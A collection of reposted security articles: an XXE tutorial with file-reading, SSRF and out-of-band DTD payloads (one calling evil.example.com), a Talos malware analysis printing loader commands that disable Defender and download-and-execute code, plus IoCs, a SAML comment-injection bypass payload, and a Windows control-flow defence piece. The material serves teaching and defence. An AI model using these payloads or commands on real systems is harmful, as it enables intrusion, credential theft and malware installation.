Note the use of the SYSTEM identifier to specify an external entity: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///dev/urandom"> ]> <foo>&xxe;</foo> Again, if uncapped, the XML parser could lock up the server by exhausting its memory to store the never-ending data. Apart from resource capping, parsers can be protected from such attacks by enabling lazy expansion to only expand entities when they are actually used. Data Extraction Attacks External entities can reference URIs to retrieve content from local files or network resources. By referencing a known (or likely) filename on the local system, an attacker can gain access to local resources, such as configuration files or other sensitive data: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <foo>&xxe;</foo> On a Linux system, this would return the content of the password file. For Windows, you could reference file:///c:/boot.ini or another common system file. Relative paths can also be used. The same approach can be used to retrieve remote content from the local network, even from hosts that are not directly accessible to the attacker. This example attempts to retrieve the file mypasswords.txt from the host at IP 192.168.0.1: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "http://192.168.0.1/mypasswords.txt"> ]> <foo>&xxe;</foo> SSRF Attacks By exploiting an XXE vulnerability, attackers can gain indirect access to an internal network and launch attacks that appear to originate from a trusted internal server. Here’s an example of server-side request forgery using an XXE payload: <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "http://internal-system.example.com/"> ]> <foo>&xxe;</foo> If executed on a web server, this could allow the attacker to send HTTP requests to an internal system, providing a foothold for further attacks. Advanced XXE Injection Using Parameter Entities More advanced XXE attacks often make use of DTD parameter entities. These are very similar to regular (general) entities but can only be referenced within the DTD itself. Here’s a simple example that uses a parameter entity to define a regular entity (note the % character used to define and then reference a parameter entity): <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY % parameterEnt "<!ENTITY generalEnt 'Bar'>" > %parameterEnt; ]> <foo>Hello &generalEnt;</foo> In this case, parameterEnt is replaced by the internal string with a regular entity definition, so the example returns Hello Bar. Attackers can use this functionality to inject external DTD files containing more parameter entities. For example, it can be useful to wrap exfiltrated data in CDATA tags so the parser doesn’t attempt to process it. 
The attacker can start by placing the following paramInjection.dtd file on their server: <!ENTITY % targetFile SYSTEM "file:///etc/passwd"> <!ENTITY % start "<![CDATA["> <!ENTITY % end "]]>"> <!ENTITY % everything "<!ENTITY wrappedFile '%start;%targetFile; %end;'>"> The actual attack is then conducted using the following XML document: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY % externalDTD SYSTEM "http://evil.example.com/paramInjection.dtd"> %externalDTD; %everything; ]> <foo>&wrappedFile;</foo> The parser loads the external DTD and then defines the internal entity wrappedFile that wraps the target file in a CDATA tag. Preventing XML External Entity Attacks XXE vulnerabilities first appeared on the OWASP Top 10 in 2017 and went straight in at #4. This class of vulnerabilities is also listed in the CWE database as CWE-611: Improper Restriction of XML External Entity Reference. Successful exploitation can not only affect application availability but also open the way to a wide variety of attacks and data exfiltration vectors, so preventing XXE attacks is crucial for web application security. XML external entity attacks rely on legacy support for Document Type Definitions, which are the oldest type of document definition, dating back to SGML. This means that disabling DTD support is the best way of eliminating XXE vulnerabilities. If that’s not possible, you can disable just the external entity support – in PHP, for example, this is done by setting libxml_disable_entity_loader(true). See the OWASP XML External Entity Prevention cheat sheet for a detailed discussion of XXE prevention methods for various parsers. To check your web applications for XXE vulnerabilities, use a reliable and accurate web application scanner. Netsparker detects XXE vulnerabilities, including out-of-band XXE, and flags them as high-severity. Sursa: https://www.netsparker.com/blog/web-security/xxe-xml-external-entity-attacks/
-
Thursday, April 2, 2020
AZORult brings friends to the party
By Vanja Svajcer.
NEWS SUMMARY
We are used to ransomware attacks and big game hunting making the headlines, but there is an undercurrent of other attack types that allow attackers to monetize their efforts in a less intrusive way. Here, we discuss a multi-pronged cyber criminal attack using a number of techniques that should alert blue team members with appropriate monitoring capability but are not immediately obvious to end-users. These threats demonstrate several techniques of the MITRE ATT&CK framework, most notably T1089 (Disabling Security Tools), T1105 (Remote File Copy), T1027 (Obfuscated Files or Information), T1086 (PowerShell), T1202 (Indirect Command Execution), T1055 (Process Injection), T1064 (Scripting), T1053 (Scheduled Task) and T1011 (Exfiltration Over Other Network Medium).
Attackers are constantly reinventing ways of monetizing their tools. Cisco Talos recently discovered a complex campaign with several different executable payloads, all focused on providing financial benefits for the attacker in a slightly different way. The first payload is a Monero cryptocurrency miner based on XMRigCC, and the second is a trojan that monitors the clipboard and replaces its content. There's also a variant of the infamous AZORult information-stealing malware, a variant of the Remcos remote access tool and, finally, the DarkVNC backdoor trojan.
What's new? Embedding an executable downloader in an ISO image file is a relatively new method of delivery for AZORult. It's also unusual to see attackers using multiple methods to make money.
How did it work? The infection chain starts with a ZIP file, which contains an ISO disk image file. When the user opens the ISO file, a disk image containing an executable loader is mounted. When the loader is launched, it deobfuscates malicious code which downloads the first obfuscated PowerShell loader stage that kickstarts the overall infection, disables security tools and the Windows Update service, and downloads and launches the payloads.
So what? Defenders need to be constantly vigilant and monitor the behavior of systems within their network. Attackers are like water — they will attempt to find the smallest crack to achieve their goals. While organizations need to be focused on protecting their most valuable assets, they should not ignore threats that are not particularly targeted toward their infrastructure.
Technical case overview
Introduction
The initial trigger for this investigation was a telemetry entry that showed a PowerShell process launching a download and executing a PowerShell loader. After the drill-down, the telemetry shows that the PowerShell downloading code was launched by an executable dropper included in an ISO image that's mounted within the operating system by the user. The ISO image seems to have been downloaded compressed with ZIP, possibly encrypted with a password, which indicates it's primarily spread via email.
Executable dropper with anti-sandboxing
The dropper's functionality is rather simple, but the code contains some interesting features. All malicious API calls are resolved dynamically by locating the PEB and traversing one of the lists of loaded modules in memory to find the module base address. From there, the downloader goes through the export table in order to find and return the address of the required function, which is then called indirectly using one of the 'call reg' instructions.
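This kind of manual import resolution is a long-standing evasion trick rather than something unique to this dropper. As a rough illustration only (not the dropper's code), the module-walking half of it can be sketched in a few lines of C using the documented structures from winternl.h; parsing the export directory (IMAGE_EXPORT_DIRECTORY) of a chosen module base then takes the place of GetProcAddress:
#include <windows.h>
#include <winternl.h>
#include <stdio.h>

int main(void)
{
    /* The PEB is reachable from the TEB without calling any API. */
    PPEB peb = NtCurrentTeb()->ProcessEnvironmentBlock;

    /* Walk the loader's in-memory-order list of loaded modules. */
    PLIST_ENTRY head = &peb->Ldr->InMemoryOrderModuleList;
    for (PLIST_ENTRY e = head->Flink; e != head; e = e->Flink) {
        PLDR_DATA_TABLE_ENTRY mod =
            CONTAINING_RECORD(e, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        /* Print each module's base address and full path. */
        wprintf(L"%p %.*ls\n", mod->DllBase,
                (int)(mod->FullDllName.Length / sizeof(WCHAR)),
                mod->FullDllName.Buffer);
    }
    return 0;
}
Because none of the functions resolved this way appear in the binary's import table, static signatures keyed on imports have very little to match on.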
All strings, including the entire command line for the downloader PowerShell code are encrypted with a static byte key, different for each string, which also gets decrypted during the execution. Command-line for the PowerShell downloader is deobfuscated using a byte XOR key. The most interesting feature is the function that randomly calls APIs from the lists twice. First, two randomly generated numbers from 0 to 9 are generated by a pseudo-random number generator and those numbers — m and n are used as parameters for the function. Random API calls function The function first randomly chooses and calls m and then n APIs from the list: GetCommandLineA GetTickCount GetLastError GetSystemDefaultLangID GetCurrentProcess GetProcessHeap GetEnvironmentStrings This is likely done to confuse behavioral detectors, emulators and sandboxes which may base their detections on sequences of executed API calls. The downloader eventually calls the MessageBox API to display a fake error message. Executable downloader fake error message. First stage PowerShell loader The first stage of the PowerShell loader is a simple command line: When the base64 command-line option is decoded, we reach the actual downloading code which uses githubusercontent.com to first disable Windows Defender, stop Windows update, download and execute the next malware stage using the Invoke-Expression cmdlet. Set-MpPreference -DisableRealtimeMonitoring $true cmd /c reg add 'HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f cmd /c sc stop wuauserv\r\ncmd /c sc config wuauserv start= disabled iex ((New-Object System.Net.WebClient).DownloadString('hxxps://gist[.]githubusercontent[.]com/mysslacc/a5b184d9d002bf04007c4bbd2a53eeea/raw/c6f8b4c36e48425507271962855f3e2ac695f99f/baseba')) The downloaded PowerShell script is first base64-decoded and decrypted using the cmdlet ConvertTo-SecureString. The result is an obfuscated PowerShell script with several layers of obfuscation, a result of applying the Invoke-Obfuscation method to the initial code. Once deobfuscated, we can see the functionality of the PowerShell loader. PowerShell loader The PowerShell script downloaded and executed by the executable downloader is responsible for the installation of payloads and ensuring that they stay persistent after user logs out. All the payloads are downloaded from external sites. The loader first sets the PowerShell preferences so that the warning and error messages are not displayed and so that the script continues executing if an error is encountered. $WarningPreference = "SilentlyContinue" $erroractionpreference = "SilentlyContinue" The execution continues with checking the current privileges. The loader behaves differently if the user has administrative privileges. If the user does not have administrative privileges, the loader creates the registry value HKCU\Software\Kumi and stores a base64 encoded string that contains code to download and execute a variant of XMRigCC cryptocurrency miner. It then creates a scheduled task with the name OneDrive SyncTask to execute hourly and launch the miner which is read from the previously created registry entry. If the user belongs to the administrators' group, the loader will first create exclusion folders for the Windows Defender so that certain folders are not scanned and then attempt to disable various Defender's user notifications so that the user is not notified if any of the components in the attack are detected. 
Malwarebytes anti-malware service will also be stopped and deleted if it exists on the computer. Finally, if the loader has administrative privileges it will attempt to create three services WinDefends, thundersec and WindowsNetworkSVC, and create three scheduled tasks to launch those services on an hourly basis. The task names are \Microsoft\Windows\Shell\updshell, \Microsoft\Windows\Autochk\SystemProxy and \Microsoft\Windows\MobilePC\DetectPC. At the time of writing, the first URL contained a loader for either a variant of Remcos remote access tool or a variant of DarkVNC remote access trojan. If the user has administrative privileges, the loader launches Remcos. Otherwise, it launches DarkVNC. The loader then downloads and launches a clipboard modification trojan from githubusercontent.com with the filename clp.exe in the user's temporary folder. This cryptocurrency stealer is described later. Regardless of the permissions, the loader will create a registry value HKCU\Software\cr\d and store the code to download and launch one of the above backdoor trojans and creates a scheduled task "Update Shell" to run every five hours. The task retrieves the value stored as a base64 encoded string in the registry and downloads code from the URL hxxps://raw[.]githubusercontent[.]com/mysslacc/thd/master/base. Finally, the loader uses a process injector RunPE to inject a variant of the Azorult information-stealing trojan into the notepad.exe process. Process tree of the PowerShell loader as seen in Cisco Threat Grid Payloads XMRigCC cryptominer Perhaps the least interesting payload installed by the loader, XMRigCC is a variant of an open-source miner that can be controlled through a command and control (C2) console. XMRigCC has its own loader, which is called by decoding and executing the content of the variable $kumi of the main loader. The particular payload is not configured to connect to a command and control server but chooses its pool host from a list of the following URLs. All connections are conducted over port 443, possibly to avoid easy detections when other ports are used. The list of hosts from the configuration is: eu[.]minerpool[.]pw 185[.]10[.]68[.]220 rig[.]zxcvb[.]pw rig[.]myrms[.]pw back123[.]brasilia[.]me rs[.]fym5gserobhh[.]pw Cisco Umbrella showing a spike of DNS requests for eu[.]minerpool[.]pw. The cryptominer installs itself depending on the loader's process privileges. If the PowerShell loader has administrative privileges, it will attempt to disable Windows Defender, Malwarebytes, Sophos and HitMan Pro if they are installed. The loader then downloads the payload from the IP address 195.123.234.33, and copies it into C:\ProgramData\Oracle\Java\java.exe. One of the interesting features is the download of a third-party driver, WinSys0 from the OpenLibSys utility, which allows the client application to read and write physical memory. However, it seems that the driver is not used and there is no evidence of the driver being loaded into memory. 
The loader creates the following scheduled tasks: \Microsoft\Windows\Bluetooth\UpdateDeviceTask \Microsoft\Windows\Shell\WindowsShellUpdate \Microsoft\Windows\Shell\WinShell \Microsoft\Windows\UPnP\UPnPHost \Microsoft\Windows\UPnP\UPnPClient Task \Microsoft\Windows\SMB\SMB Task \Microsoft\Windows\EDP\EDP App Lock Task \Microsoft\Windows\EDP\EDP App Update Cache \Microsoft\Windows\MobilePC\DetectPC \Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization \Microsoft\Windows\.NET Framework\.NET Framework Cache Optimization Files-S-3-5-21-2236678155-433529325-2142214968-1138 and creates one of the two services, depending on the bitness of the operating system: cli_optimization_v2.0.55727_64 cli_optimization_v2.0.55727_32 The services simply call mshta.exe to download an HTML application that downloads and runs the same cryptominer loader. The loader downloads and runs a PowerShell script del.ps1 that disables Windows event logging and attempts to terminate system utilities such as Process Explorer, Task Manager, Process Monitor and Daphne Task Manager. The non-administrative branch of the cryptominer loader is quite similar and takes into account that changes are made to objects that can be modified by the current user. Here is the list of new scheduled task names created by the lower-privilege branch of the loader: OneDrive Sync OneDrive SyncTask Optimization .NET Optimize Start Menu Cache Files-S-3-5-21-2236678155-433519125-1142214968-1037 Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1137 Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1138 Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1337 Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142214968-1447 Optimize Start Menu Cache Files-S-3-5-21-2236678155-433529325-1142314968-1037 \Microsoft\Windows\Optimization Clipboard cryptocurrency stealer The next payload is a cryptocurrency clipboard-stealing trojan. The main loader downloads it from hxxps://gist[.]githubusercontent[.]com/mysslacc/ee6d2b99f8e3a3475b7a36d9e96d1c18/raw/1a82b38931d8421406f53eb8fc4c771127b27ce4/clp, saves it in the user's temporary folder as "clp.exe," which is then launched. The trojan copies itself into the file updip.exe in the user's ProgramData\updip folder and creates a link file udpid.lnk in the user's Startup folder so that the malware runs every time the user logs into the system. The link file is created by a PowerShell process that is called directly by the trojan with a long command line containing a base64-encoded script. The persistence is also ensured by creating a new scheduled task — GoogleChromeUpdateTask — which runs the trojan every three hours. Apart from the installation and persistence, the main functionality of the trojan is contained in a simple loop that monitors the clipboard content every half a second. The trojan contains an obfuscated list of regular expressions used to match the clipboard content. The strings are stored either as a data buffer or as constants assigned to contiguous memory locations. Once a buffer is created, its contents are XORd with the byte key 0x2e. Deobfuscating a regex to match Bitcoin addresses. Here, we see that the trojan initialises a memory buffer with the value 70751f1d73754f03454303546f03666403607e03741e031773551c18021d1d53, which after XOR, reveals a regular expression #^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$, apparently used to match Bitcoin addresses. 
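The XOR layer is easy to peel off outside a debugger as well. The following stand-alone C snippet is only an illustration (the hex blob and the 0x2e key are the values quoted above, not code taken from the sample):
#include <stdio.h>
#include <string.h>

int main(void)
{
    /* Encrypted buffer as shown above; single-byte XOR key 0x2e. */
    const char *hex =
        "70751f1d73754f03454303546f03666403607e03741e031773551c18021d1d53";
    size_t len = strlen(hex);
    for (size_t i = 0; i + 1 < len; i += 2) {
        unsigned int b;
        sscanf(hex + i, "%2x", &b);     /* read one byte of the blob */
        putchar((int)(b ^ 0x2e));       /* undo the XOR and print it */
    }
    putchar('\n');  /* prints ^[13][a-km-zA-HJ-NP-Z0-9]{26,33} */
    return 0;
}
(The attacker's replacement Bitcoin address discussed below is recovered from its buffer in the same way.)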
If a Bitcoin address is matched, the malware calls the routine to modify the clipboard, presumably to redirect any transactions to the address owned by the attacker.
Decrypting attacker's Bitcoin wallet address to replace the clipboard data.
Based on the arguments of the function, the trojan will choose one of the attacker-owned cryptocurrency addresses and modify the clipboard to contain the deobfuscated data. Once again, we see here that the buffer is filled with the value 1d6d5d4a17745f1a5c1f184a787f5b7c6b5d1b1c571b4b646849776b5f7f446f561f, which becomes the address 3Csd9Zq4r16dVQuREs52y5eJFgYEqQjAx1 after deobfuscation. We can easily see that this address earned just a bit under six Bitcoins over time.
The number of transactions and the amount earned by the clipboard stealer in Bitcoins.
The trojan targets Bitcoin, Litecoin, Ethereum, Dash, Monero and Doge-Coin using the following regular expressions:
^[13][a-km-zA-HJ-NP-Z0-9]{26,33}$ - Bitcoin
^0x[a-fA-F0-9]{40}$ - Ethereum
^[LM][A-z][1-9A.z]{32}$ - Litecoin
^D{1}[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$ - Doge-Coin
^DX[a-z][1-9A-z]{32}$ - Dash (incorrect regular expression)
^[0-9][0-9AB][123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz]{93}$ - Monero
The next three payloads are all delivered using a PowerShell technique which downloads an obfuscated binary loader and a byte array in a text format and transforms them into actual binaries. The download is executed by using reflection to load the VisualBasic assembly and then interact with PowerShell using the VisualBasic interaction interface. The script first decompresses and loads a binary loader, RunPE, which is then used to load a byte array that contains the binary payload into the process space of a newly created process: explorer.exe, control.exe or notepad.exe for Remcos, DarkVNC and Azorult respectively. All of the payloads are common, so we will only briefly describe them. A full analysis is outside of the scope of this post.
Downloading and loading RunPE that loads a DarkVNC payload from a byte array
AZORult
AZORult is an information-stealing bot written in Delphi which connects to a command and control server for so-called "work", which comes in the form of a JSON configuration. The communication with the C2 server is conducted using HTTP with the payload encrypted with a default XOR key 0x0d, 0x0a, 0xc8. Once installed, the bot contacts the server using a POST request. Depending on the version of the bot, the server can send a JSON configuration or a set of DLLs to help with stealing information, as well as a set of new strings that should be used when matching targeted content for exfiltration. AZORult may attempt to execute one or more of:
Steal stored browser passwords
Steal cryptocurrency wallets
Steal browser history
Steal website cookies
Steal email credentials
Steal Telegram credentials
Steal Steam credentials
Steal Skype credentials and message history
Take victim machine screenshots
Execute custom commands
Remcos
Remcos is a RAT that is offered for sale by a company called Breaking Security. While the company says it will only sell the software for legitimate uses (as described in comments in response to an earlier article) and will revoke the licenses of users not following their EULA, the sale of the RAT gives attackers everything they need to establish and run a potentially illegal botnet. Remcos has the functionalities that are typical of a RAT.
It is capable of hiding in the system and using malware techniques that make it difficult for the typical user to detect the existence of Remcos. It is written in C++ and is relatively small for the rich functionality it contains. The Remcos payload included by the PowerShell loader is the latest version 2.5.0. Talos has created a decoder that allows simple extraction of Remcos configurations. Cisco Umbrella shows an increase in requests for the default C2 domain dfgdgertdvdf.xyz of the sample around the time we found the initial PowerShell loader. DNS activity for the default C2 domain of the Remcos payload. DarkVNC If the user does not have administrative privileges the loader will attempt to load a variant of the DarkVNC trojan, which allows the attacker to remotely access the infected system using the VNC protocol. The C2 server IP address for this sample, 52.15.61.57, is shared with one of the C2 domains specified in the Remcos sample configuration — dfgdgertdvdf.online. This IP address has been actively used in several campaigns from at least mid-December 2019. Indeed, we can see that the DNS activity for this domain corresponds with the activity for the default Remcos C2. DarkVNC attempts to connect to the C2 server using the TCP port 8080, likely to be less suspicious as this is one of the default ports for connections to HTTP proxies. DNS activity for the default C2 domain of the DarkVNC payload. DarkVNC launches a new svchost.exe process and depending on the bitness of the operating system injects a version of a 32- or 64-bit DLL into the svchost.exe process space. The loaded library is extracted from the dropper and it contains remote access functionality. Conclusion In this post, we covered an attack that comes from an actor with a low to medium level of technical ability but quite a clear idea on how to achieve their financial goals. For that they decided to employ a combination of several payloads, ranging from a cryptocurrency miner to well-known information stealer AZORult, remote access tools Remcos and DarkVNC and a clipboard modification trojan. Loaders and payloads used in the AZORult, Remcos et co attack. It is worth remembering that even in special times for cyber criminals, it is just business as usual. Furthermore, as users are worried by the SARS-CoV-2 pandemic and are increasingly working from home the attackers will take advantage and continue to conduct their attacks with a higher probability of remaining unnoticed. Coverage Ways our customers can detect and block this threat are listed below. Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. Exploit Prevention present within AMP is designed to protect customers from unknown attacks such as this automatically. Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks. Email Security can block malicious emails sent by threat actors as part of their campaign. Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), Cisco ISR, and Meraki MX can detect malicious activity associated with this threat. AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products. Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. 
Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. IoCs OSQuery Cisco AMP users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click below: Malware AZORult Registry SHA256 PE Payloads bf2f3f1db2724b10e4a561dec10f423d99700fec61acf0adcbb70e23e4908535 - Remcos payload 42525551155fd6f242a62e3202fa3ce8f514a0f9dbe93dff68dcd46c99eaab06 - AZORult payload 2014c4ca543f1cc946f3b72e8b953f6e99fbd3660edb4b66e2658b8428c0866d - 64 bit XMRigCC bde46cf05034ef3ef392fd36023dff8f1081cfca6f427f6c4894777c090dad81 - DarkVNC main 1c08cf3dcf465a4a90850cd256d29d681c7f618ff7ec94d1d43529ee679f62f3 - DarkVNC 64 bit DLL a02d761cbc0304d1487386f5662a675df3cc6c3ed199e8ed36f738e9843ccc1b - RunPE loader for AZORult, Remcos and DarkVNC 2f1668cce3c8778850e2528496a0cc473edc3f060a1a79b2fe6a9404a5689eea - Clipboard Crypto currency stealer unpacked 9e3a6584c77b67e03965f2ae242009a4c69607ea7b472bec2cba9e6ba9e41352 - 32 bit XMRigCC 29695ca6f5a79a99e5d1159de7c4eb572eb7b442148c98c9b24bdfdbeb89ffc0 - 32 DarkVNC dll aca587dc233dd67f5f265bfda00aec2d4196fde236edfe52ad2e0969932564ed - Clipboard Crypto currency stealer Droppers 598c61da8e0932b910ce686a4ab2fae83fa3f1b2a4292accad33ca91aa9bd256 - Main Executable loader d88ed1679d3741af98e5d2a868e2dcb1fa6fbd7b56b2d479cfa8a33d8c4d8e0b - ISO image distributeted in a ZIP file HTML apps connected with XMRigCC 936fbe1503e8e0bdc44e4243c6b498620bb3fefdcbd8b2ee85316df3312c4114 57f1b71064d8a0dfa677f034914e70ee21e495eaab37323a066fd64c6770ab6c f46a1556004f1da4943fb671e850584448a9521b86ba95c7e6a1564881c48349 b7c545ced7d42410c3865faee3a47617f8e1b77a2365fc35cd2661e571acdc06 PowerShell scripts 2548072a77742e2d5b5ee1d6e9e1ff9d67e02e4c96350e05a68e31213193b35a 14e956f0d9a91c916cf4ea8d1d581b812c54ac95709a49e2368bd22e1f0a32ca - XMRigCC loader cea286c1b346be680abbbabd35273a719d59d5ff8d09a6ef92ecf75689b356c4 - deobfuscated PowerShell Downloader 35b95496b243541d5ad3667f4aabe2ed00066ba8b69b82f10dd1186872ce4be2 - cleanup script ef9fc8a7be0075eb9372a2564273b6c1fffdb4b64f261b90fefea1d65f79b34e - part of XMRigCC support 3dd5fbf31c8489ab02cf3c06a16bca7d4f3e6bbc7c8b30514b5c82b0b7970409 - Main PowerShell loader variant q5fdc4103c9c73f37b65ac3baa3cceae273899f4e319ded826178a9345f6f4a00 - Main PowerShell loader variant URLs hxxp://195[.]123[.]234[.]33/win/checking[.]hta hxxp://195[.]123[.]234[.]33/win/checking[.]ps1 hxxp://195[.]123[.]234[.]33/win/del[.]ps1 hxxp://195[.]123[.]234[.]33/win/update[.]hta hxxp://answerstedhctbek[.]onion hxxp://asq[.]r77vh0[.]pw/win/checking[.]hta hxxp://jthnx5wyvjvzsxtu[.]onion[.]pet hxxp://qlqd5zqefmkcr34a[.]onion[.]pet/win/checking[.]hta hxxps://answerstedhctbek[.]onion hxxps://answerstedhctbek[.]onion[.]pet hxxps://asq[.]d6shiiwz[.]pw/win/checking[.]ps1 hxxps://asq[.]d6shiiwz[.]pw/win/hssl/d6[.]hta hxxps://asq[.]r77vh0[.]pw/win/checking[.]ps1 hxxps://asq[.]r77vh0[.]pw/win/hssl/r7[.]hta hxxps://darkfailllnkf4vf[.]onion[.]pet hxxps://dreadditevelidot[.]onion[.]pet hxxps://fh[.]fhcwk4q[.]xyz/win/checking[.]ps1 hxxps://fh[.]fhcwk4q[.]xyz/win/hssl/fh[.]hta hxxps://qlqd5zqefmkcr34a[.]onion[.]pet/win/checking[.]hta hxxps://runionv62ul3roit[.]onion[.]pet hxxps://rutorc6mqdinc4cz[.]onion[.]pet hxxps://thehub7xbw4dc5r2[.]onion[.]pet hxxps://torgatedga35slsu[.]onion hxxps://torgatedga35slsu[.]onion[.]pet hxxps://torrentzwealmisr[.]onion[.]pet hxxps://uj3wazyk5u4hnvtk[.]onion[.]pet 
hxxps://vkphotofqgmmu63j[.]onion[.]pet hxxps://xmh57jrzrnw6insl[.]onion[.]pet hxxps://zqktlwiuavvvqqt4ybvgvi7tyo4hjl5xgfuvpdf6otjiycgwqbym2qad[.]onion[.]pet hxxps://zzz[.]onion[.]pet hxxp://memedarka[.]xyz/ynvs2/index.php Domains dfgdgertdvdf[.]online - DarkVNC and Remcos C2 dfgdgertdvdf[.]xyz - Remcos C2 memedarka[.]xyz - AZORult C2 Cryptocurrency wallets 855vLkzTFwr82TrfPKLH6w3UB19RGdHDsGY1etmdyZjZChbhyghtiK66ZVXoVayJXVNydca7KZqE53Dn2Hsk8WdKDmjq3bu - Monero XrchZULVyJPAFro13627cyKdfb6ojerRwv - Dash 3Csd9Zq4r16dVQuREs52y5eJFgYEqQjAx1 - Bitcoin 0x51664e573049ab1ddbc2dc34f5b4fc290151cdb4 - Ethereum LS2GBEJEzgDy14hVHFp4JJzjKoiMgkbZAY - Litecoin D6yFAuCDoMkCftyXTWY8m267PzxeoaiMX7 - Doge-coin Posted by Vanja Svajcer at 11:04 AM Labels: Clipboard trojan, cryptominers, exfiltration, ISO image, Powershell, remote access tool, Threat Research Sursa: https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html
-
Bounty Tip: How to bypass authorization in SAML!
Shaurya Sharma Apr 3 · 2 min read
Security Assertion Markup Language (SAML) is an open XML-based standard for exchanging authentication and authorization data between parties. The vulnerabilities described here stem from decisions made by various SSO providers and by several libraries implementing SAML SSO (Single Sign-On).
Using the SAML protocol, users can access many of their cloud applications with just one username and password. Single Sign-On (SSO) is a common technology that allows you to log in to a web application through a trusted "third party". It is in this implementation that an error lies which allows an attacker to place a comment inside the username field; the only condition is the presence of a valid username.
The problem lies in how comments in the XML markup are processed. When a comment is placed inside the username field, the value is split into two text nodes, and when processing the user name, some implementations "cut off" the value at the comment and do not take the rest into account when checking:
import xml.etree.ElementTree as et
doc = "<NameID>test<!-- comment -->user</NameID>"
data = et.fromstring(doc)
print(data.text)  # returns 'testuser'
This particular parser joins the text around the comment and returns the full value "testuser", but a parser or API that reads only the text node preceding the comment returns just "test". Because XML canonicalization drops comments before the signature is computed and verified, the signature still validates, while the NameID that the service provider actually processes is the truncated value. It is this mismatch between signature verification and value extraction that makes the bypass possible.
As an example of this attack, a user with access to the user@user.com.evil.com account can modify the SAML response so that the NameID is processed as user@user.com by the SP:
<SAMLResponse>
  <Issuer>https://idp.com/</Issuer>
  <Assertion ID="_id1234">
    <Subject>
      <NameID>user@user.com<!---->.evil.com</NameID>
    </Subject>
  </Assertion>
  <Signature>
    <SignedInfo>
      <CanonicalizationMethod Algorithm="xml-c14n11"/>
      <Reference URI="#_id1234"/>
    </SignedInfo>
    <SignatureValue>
      some base64 data that represents the signature of the assertion
    </SignatureValue>
  </Signature>
</SAMLResponse>
The following solutions are subject to this attack:
OneLogin - python-saml - CVE-2017-11427
OneLogin - ruby-saml - CVE-2017-11428
Clever - saml2-js - CVE-2017-11429
OmniAuth-SAML - CVE-2017-11430
Shibboleth - CVE-2018-0489
Duo Network Gateway - CVE-2018-7340
It is worth noting that the attack does not work against accounts protected by two-factor authentication (which is enabled by roughly 10% of users, according to Google statistics). To prevent such attacks, update the affected libraries, disable public registration of user accounts on important systems, or move away from a configuration in which comments are silently ignored during signing, so that an inserted comment invalidates the signature instead of being skipped.
#HappyHunting #BugBountyTips
Sursa: https://medium.com/bugbountywriteup/bounty-tip-how-to-bypass-authorization-in-saml-f7577a6541c4
-
Windows 10 security: How the shadow stack will help to keep the hackers at bay
by Mary Branscombe in Security on April 3, 2020, 2:54 AM PST
How Windows will use Intel's Control-flow Enforcement Technology to block whole classes of common attacks, now it's finally reaching the market.
Fixing the individual bugs behind the vulnerabilities that hackers use to attack systems is important, but it's much more effective to block the techniques attackers use to exploit those vulnerabilities and remove an entire class of exploits -- or at least make them more expensive and time-consuming to create. Return-oriented programming (ROP) has been a very common technique that's particularly hard to block, because instead of trying to inject their own code into running processes (something operating systems and browsers have been adding defences against), attackers look for small chunks of the legitimate code that's already in memory that contain 'returns' -- where the code jumps forward to a new routine or back to the main thread.
"With ROP, I can't create new code; I can only jump around to different pieces of code and try to string that together into a payload," Dave Weston, director of OS security at Microsoft, told TechRepublic. If the legitimate code has a memory safety bug like a buffer overflow, corrupting those pointers in memory means the system starts running the attacker's own code instead of going back to the address in the program's call stack.
Microsoft has been working on ways to stop attackers hijacking the flow of control in programs like this since around 2012. Windows has added multiple levels of protection, starting with signing important code (Code Integrity Guard, or CIG) and blocking runtime code generation first in the browser and then in VMs and the kernel (Arbitrary Code Guard, or ACG). "The goal there is to prevent the attacker from loading a binary that Microsoft or one of our third parties didn't sign; even if they are able to exploit the process and get memory corruption in the process, they can't inject shellcode or other constructs," Weston explained.
That defence was effective enough to push attackers to use ROP, so the next step was trying to protect the flow of control within the program. Control flow integrity arrived in Windows 8.1 as Control Flow Guard (CFG). This blocks forward control flow attacks (where the code jumps out or makes a call and attackers try to send it to the wrong place). "At compile time, we take a record of all the indirect transfers or jumps or calls that the software developer intends the code to make, and that map is passed to the kernel when you load the binary and it's enforced when the code runs," Weston said. If an attacker does manage to send the code to an address that isn't on the map, the process is terminated: an infected app will crash, but it won't run the malicious code.
